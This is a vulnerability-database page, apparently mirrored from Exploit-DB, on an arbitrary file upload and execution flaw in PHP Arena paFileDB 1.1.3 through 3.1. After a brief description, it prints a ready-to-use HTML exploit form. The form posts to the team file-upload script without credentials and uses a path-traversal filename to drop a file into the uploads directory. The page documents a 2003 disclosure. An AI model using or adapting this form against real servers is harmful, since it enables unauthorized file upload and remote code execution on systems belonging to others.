PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 – Arbitrary File Upload / Execution

PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 – Arbitrary File Upload / Execution

漏洞ID 1054052 漏洞类型
发布时间 2003-07-24 更新时间 2003-07-24
图片[1]-PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 – Arbitrary File Upload / Execution-安全小百科CVE编号 N/A
图片[2]-PHP Arena paFileDB 1.1.3/2.1.1/3.0/3.1 – Arbitrary File Upload / Execution-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22955
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8271/info

It has been reported that a script contained in paFileDB does not properly verify user credentials before accepting files for upload. As a result, remote attackers may be able to upload files to the Web server. After a file has been uploaded, it may be possible for the attacker to execute the file remotely.

<html><body>
<form ENCTYPE="multipart/form-data" method="POST" action="http://srv/pafiledb/includes/team/file.php">
<input name="userfile" TYPE="file"><br>
<input name="userfile_name" TYPE="text" value="../../../uploads/makeawish"><br>
<input type="hidden" name="action" value="team">
<input type="hidden" name="tm" value="file">
<input type="hidden" name="file" value="upload">
<input type="hidden" name="upload" value="do">
<input type=submit name=submit value="doit">
</form>
</body></html>

相关推荐: Sonata Local Arbitrary Command Excution Vulnerability

Sonata Local Arbitrary Command Excution Vulnerability 漏洞ID 1103642 漏洞类型 Design Error 发布时间 2000-12-18 更新时间 2000-12-18 CVE编号 N/A CNN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享